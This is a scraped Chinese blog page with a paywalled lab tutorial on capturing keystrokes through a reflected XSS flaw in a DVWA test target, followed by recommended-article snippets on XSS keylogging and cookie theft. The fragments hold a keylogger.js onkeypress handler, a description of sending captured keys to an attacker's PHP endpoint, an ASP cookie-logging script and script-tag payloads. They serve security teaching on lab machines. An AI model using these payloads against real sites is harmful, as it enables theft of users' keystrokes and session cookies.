xss盗取键盘记录实例

最新推荐文章于 2025-06-03 17:00:31 发布
原创 最新推荐文章于 2025-06-03 17:00:31 发布 · 1.2k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss

本实验以反射型xss漏洞为例
实验环境:kali 192.168.133.131
dvwa靶机 192.168.133.128

1、首先看起kali上的apache服务,命令:

/etc/init.d/apache2 start

2、在kali的浏览器输入:http://192.168.133.131 或 http://localhost 地址进行访问测试,检查apache是否开启成功
在这里插入图片描述
3、 进入kali的/var/www/html路径创建三个文件
Keylogger.js Keylogger.php Keylog.txt
在这里插入图片描述
(1)keylogger.js[js脚本文件]

document.onkeypress = function(evt) {
   
   
    evt
最低0.47元/天 解锁文章

200万优质内容无限畅学
20-5 XSS的利用(包含:蓝莲花、beef-xss
weixin_43263566的博客
01-12 473
存储型XSS是一种特殊类型的XSS攻击。攻击者将带有XSS攻击代码的链接放在网页上的某个位置(例如评论框),当用户访问此链接并执行时,攻击者就能获取用户的敏感信息。由于存储型XSS能够攻击所有访问此页面的用户,因此其危害非常大。之后刷新网页或从其他菜单切换到当前url都会触发攻击,出现弹框。那知道了这个机制后我们就开始收集用户的cookie。
XSS获取键盘记录练习
weixin_44720762的博客
05-03 1207
在开始本篇博客之前,我想先声明,本人初涉安全领域知识,此博客用于记录日常渗透练习心得,并不提倡用着专业指导知识,请选择性阅读。 因为相关知识的练习性,先对部分名词含义进行说明。 跨域: URL(统一资源定位符)中有 协议,子域名,主域名,端口,资源地址。在任意两个URL中这几个部分中任意部分纯在不同就是跨域操作。我们把任意两个域间进行的资源访问操作称为跨域操作。 同源策略:同源策略(Same or...
xss-键盘记录
weixin_46164380的博客
03-08 264
开启liunx的apache服务。 /etc/init.d/apache2 start 在/var/www/html下面创建三个文件 keylogger.js document.onkeypress = function(evt) { evt = evt || window.event key = String.fromCharCode(evt.charCode) if...
XSS的高级利用(非常详细)从零基础入门到精通,收藏这篇就够了
最新发布
Libra1313的博客
06-03 634
想象一下,未经任何安全考量的用户输入,像脱缰的野马一样,直接冲向了公共页面。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。字段,每一个访问页面的用户都成了潜在的受害者,浏览器沦为恶意代码的游乐场。最终,白帽小哥凭借敏锐的洞察力,赢得了800美元的赏金。个人吐槽:这段代码简直是教科书级别的窃密流程,如果我是黑客,我可能会加个延时函数,让整个过程更隐蔽。接下来,让我们看看精心构造的Payload,是如何将XSS的危害提升到新的高度的。的事情了,而工作绕不开的就是。
XSS跨站脚本攻击:获取键盘记录
jklbnm12的博客
01-20 1407
将进行下图3个实验,更好的来理解xss的危害和原理 先去修改下Pikachu靶机中的,cookie.php修改成自己的ip 实验1:xss如何获取cookie? 只需要将  Pikachu靶机中的pkxss文件复制到攻击机中的站点(www)下即可。 登入下      默认没任何数据 1.1 GET型XSS利用:cookie获取 先将字符长度的限制给修改掉 pkxss后台: http://192.168.43.117/pkxss/pkxss_login.php 现在是没
2. XSS- 键盘记录器和反射型XSS
qq_41860876的博客
12-20 520
任务099:XSS- 键盘记录器和反射型XSS 进行xss利用进行键盘记录发送给黑客 黑客的服务器大部分但是用的肉鸡服务器 1 . 创建一个Keylogger.js文件 下面文件内容 意思就是将输入的内容发送给服务器http://192.168.55.26/keylogger.php文件document.onkeypress = function(evt) { evt = evt || win...
XSS跨站脚本攻击之——XSS获取键盘记录
温柔小薛的博客
04-05 568
XSS获取键盘记录 条件比较苛刻 除非对方网站管理员配置了跨域访问否则无法实现 理论 什么是跨域 http:// www. oldboyedu.com :80 / news/index.php 协议 :// 子域名 . 主域名 : 端口 / 资源地址 当协议、主机(主域名,子域名)、端口中的任意一个不相同时,称为不同域。我们把不同的域之间请...
XSS解析——pikachu靶场
Aquarius_ego的博客
05-10 1295
XSS讲解——用pikachu靶场复现xss的四种危害:劫持用户cookie、框架钓鱼、挂马、键盘记录
XSS (跨站脚本攻击) 分析与实战
a10534126的博客
02-23 1813
文章目录 一、漏洞原理 1、XSS简介: 2、XSS原理解析: 3、XSS的分类: 3.1、反射型XSS 3.2、存储型XSS 3.3、DOM型XSS 二、靶场实战 XSS实现盗取管理员Cookie并登录: 一、漏洞原理 1、XSS简介: XSS全称:Cross Site Scripting,即跨站脚本攻击,为了不和“层叠样式表”(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是最常见的 Web 应用程序安
XSS跨站脚本攻击理论和实战 XSS构造脚本+手动XSS+利用BEef自动化XSS(网络安全学习13)
Until_U的博客
07-06 6240
CONTENTS 1 XSS简介 2 构造XSS脚本 2.1 常用的HTML标签 2.2 常用java script方法 2.3 构造XSS脚本 3 反射型XSS 4 存储型XSS 5 kali渗透获取cookie 6 自动化XSS 6.1 BEef简介 6.2 BEef的主要功能 6.3 BEef实战 1 XSS简介 (1)XSS相关概念 跨站脚本( cross site script )为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现...
3-8案例演示-xss获取键盘记录实验演示
山兔的博客
04-26 1148
在实验前,先了解一下什么是跨域 因为在这个实验里面,我们会去远程的调用js文件,远程调用js会涉及到跨域请求的问题 http:// www . xyz.com : 8080 / script/test.js 协议 子域名 主域名 端口 资源地址 当协议、主机(主域名、子域名)、端口中的任意一个不相同时,称为不同域 我们把不同的域之间请求数据的操作,成为跨域操作 跨域-同源策略 而为了安全考虑,所有的浏览器都约定了“同源策略”,(同源策略是在浏览器端去执行的)同源策略规定,两个不同
XSS漏洞利用---键盘记录
Ethan024的博客
03-13 562
XSS漏洞利用(本文仅供技术学习与分享) 存储型XSS漏洞之钓鱼 实验准备: 皮卡丘靶场; 存在存储型xss漏洞的网页; pkxss键盘记录后台; 实验步骤: 4. 嵌入恶意的js标签 — src=“http://localhost/pikaqiu.cn/pkxss/rkeypress/rk.js” 5. 在输入框中输入字符串:111111并查看后台,发现已经记录。 Tips: 如果无法记录数据,需关闭浏览器的同源策略Access-Contrl-Allow-Origin. ...
XSS获取键盘原理
鸣蜩十四的博客
08-09 750
涉及的js知识: onkeypress 事件会在键盘按键被按下并释放一个键时发生 fromCharCode() 可接受一个指定的 Unicode 值,然后返回一个字符串。 charCode 事件属性 事件对象 实例 获取按下的键盘按键Unicode值 XMLHttpRequest 对象能够: 在不重新加载页面的情况下更新网页 在页面已加载后从服务器请求数据 在页面已加载后从服务器接收数据 在后台向服务器发送数据 encodeURI(key)对URI 进行完整的编码 http.open第三个参数设置请求是否为
xss漏洞 (跨站脚本攻击)
qq_59607911的博客
10-17 837
标签:</script><script>alert(1)
XSS键盘记录和cookie获取
Williamanddog的博客
01-26 2737
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混 淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意JavaScript代码,当用户浏览该页 面时,嵌入Web里面的JS代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的 攻击。 在一个Web页面上,有一种很常见的功能是将用户输入的内容输出到页面上。但是如果这里输入的内容 。
获取cookie_XSS获取COOKIE
weixin_31467557的博客
01-27 1392
XSS获取COOKIESession(会话) 如果想要知道cookie是做什么的,那么就需要了解一下什么是会话(Session),会话,说白了其实就是用来维持你的一整个访问流程,而在程序中,跟踪会话是很重要的事情,拿某宝举栗子,用户a在浏览的时候,他放入购物车的东西无论什么时间放入的,都是属于同一个会话,不会进入b的购物车中,二者不能够混淆,因为二者属于是不同的会话。HTTP...
XSS 测试
keyongle的博客
06-11 3911
原文转载来自:https://www.cnblogs.com/TankXiao/archive/2012/03/21/2337194.htmlWeb安全测试之XSSXSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的....
XSS获取cookie并利用
kuxing100的专栏
07-11 1883
获取cookie利用代码cookie.asp xx msg = Request("msg")   //获取提交过来的msg变量,也就是cookie值 set fs = server.CreateObject("scripting.filesystemobject")//创建一个fs对象 set thisfile = fs.OpenTextFile(t
利用XSS获取cookie
热门推荐
littlecjx
11-04 2万+
如果web应用在用户输入的地方没有过滤特殊字符,比如<, >, ', ", <script>, javascript 等字符,而且在变量输出的地方没有使用安全的编码函数,比如PHP的htmlentities()和htmlspecialchars()函数,JavaScript中的escapeJavascript函数,这样的web应用极易出现XSS漏洞XSS攻击的危害主要有盗取用户cookie、跳转到
xss键盘记录脚本代码
09-13
由于XSS(跨站脚本攻击)主要是用于注入恶意代码,而不是直接获取用户的键盘记录数据,所以它本身并不包含键盘记录脚本。然而,过去一些恶意的XSS脚本可能会利用JavaScript来模拟键盘事件(比如`document.onkeydown`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值